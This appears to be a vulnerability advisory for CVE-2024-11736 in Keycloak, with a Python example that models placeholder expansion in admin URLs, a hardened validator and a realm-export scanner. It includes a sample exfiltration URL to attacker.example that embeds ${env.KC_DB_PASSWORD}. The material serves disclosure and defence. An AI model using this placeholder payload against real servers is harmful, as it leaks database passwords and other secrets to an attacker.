Exposure of Sensitive Information Through Environmental Variables
CVE-2024-11736
Summary
A security vulnerability has been identified that allows admin users to access sensitive server environment variables and system properties through user-configurable URLs. Specifically, when configuring backchannel logout URLs or admin URLs, admin users can include placeholders such as `${env.VARNAME}` (environment variable) or `${PROPNAME}` (system property). The server replaces these placeholders with the actual values of the environment variables or system properties during URL processing, so the resolved values end up in a URL the admin chose. This issue affects Keycloak (org.keycloak) versions prior to 26.0.8.
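The following is an added example, written for this page and not taken from Keycloak's source, that models the behaviour the summary describes: a `${env.NAME}` / `${NAME}` replacer applied to an admin-supplied URL, the hardened handling that refuses to expand such URLs at all, and a scanner that flags placeholder syntax in the URL fields of a realm export. The environment, system properties and realm export are constructed sample data; the field names `rootUrl`, `baseUrl`, `adminUrl` and the attribute key `backchannel.logout.url` are assumed to match the realm-export JSON layout, so check them against your own export before relying on the scanner.

```python
import re
from typing import Dict, List, Tuple

# Matches ${name}; the name is either "env.VAR" or a system-property name.
PLACEHOLDER = re.compile(r"\$\{([^}]+)\}")


def expand_placeholders(url: str, env: Dict[str, str], props: Dict[str, str]) -> str:
    """Illustrative model (not Keycloak's code) of the pre-26.0.8 behaviour:
    ${env.NAME} is replaced with an environment variable, ${NAME} with a
    system property. Unknown names are left in place unchanged."""
    def repl(m: "re.Match") -> str:
        name = m.group(1)
        if name.startswith("env."):
            return env.get(name[4:], m.group(0))
        return props.get(name, m.group(0))
    return PLACEHOLDER.sub(repl, url)


def resolve_admin_url(url: str) -> str:
    """Hardened handling: an admin-configured URL is never run through the
    property replacer. Anything carrying placeholder syntax is rejected at
    configuration time, so a bad value fails closed instead of leaking when
    the server later contacts the URL."""
    if "${" in url:
        raise ValueError(f"placeholder syntax is not allowed in admin-configured URLs: {url!r}")
    if not re.match(r"^https?://", url):
        raise ValueError(f"expected an absolute http(s) URL: {url!r}")
    return url


# Assumed realm-export field names / attribute key (verify against your export).
URL_FIELDS = ("rootUrl", "baseUrl", "adminUrl")
URL_ATTRIBUTES = ("backchannel.logout.url",)


def find_placeholder_urls(realm_export: dict) -> List[Tuple[str, str, str]]:
    """Scan a realm export for client URL fields containing ${...}.
    Returns (clientId, field, value) triples in document order."""
    hits: List[Tuple[str, str, str]] = []
    for client in realm_export.get("clients", []):
        cid = client.get("clientId", "?")
        for field in URL_FIELDS:
            value = client.get(field) or ""
            if PLACEHOLDER.search(value):
                hits.append((cid, field, value))
        for attr in URL_ATTRIBUTES:
            value = (client.get("attributes") or {}).get(attr) or ""
            if PLACEHOLDER.search(value):
                hits.append((cid, "attributes." + attr, value))
    return hits


# Constructed sample data for the demonstration; none of these are real secrets.
SAMPLE_ENV = {"KC_DB_PASSWORD": "db-pass-123", "HOME": "/opt/keycloak"}
SAMPLE_PROPS = {"java.version": "17.0.2", "user.name": "keycloak"}

MALICIOUS_URL = "https://attacker.example/logout?db=${env.KC_DB_PASSWORD}&jv=${java.version}"

SAMPLE_REALM_EXPORT = {
    "realm": "demo",
    "clients": [
        {"clientId": "benign-app", "rootUrl": "https://app.example",
         "adminUrl": "https://app.example/admin",
         "attributes": {"backchannel.logout.url": "https://app.example/logout"}},
        {"clientId": "evil-app", "rootUrl": "https://attacker.example",
         "adminUrl": "https://attacker.example/admin?u=${user.name}",
         "attributes": {"backchannel.logout.url": MALICIOUS_URL}},
    ],
}

if __name__ == "__main__":
    print("vulnerable expansion:", expand_placeholders(MALICIOUS_URL, SAMPLE_ENV, SAMPLE_PROPS))
    for hit in find_placeholder_urls(SAMPLE_REALM_EXPORT):
        print("placeholder in client config:", hit)
    try:
        resolve_admin_url(MALICIOUS_URL)
    except ValueError as err:
        print("hardened handling rejected it:", err)
```

The vulnerable path turns the stored backchannel logout URL into `https://attacker.example/logout?db=db-pass-123&jv=17.0.2`, which is the URL the server would then contact; the hardened path rejects the stored value outright, and the scanner gives operators a way to audit existing client configuration for the same pattern before or after upgrading.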
CVSS v3.1 base metrics (vector AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N):
- Attack Vector: NETWORK
- Attack Complexity: LOW
- Privileges Required: HIGH
- User Interaction: NONE
- Scope: UNCHANGED
- Confidentiality Impact: HIGH
- Integrity Impact: NONE
- Availability Impact: NONE
CWE-526 - Exposure of Sensitive Information Through Environmental Variables
Environmental variables may contain sensitive information about a remote server.
Advisory Timeline
- Published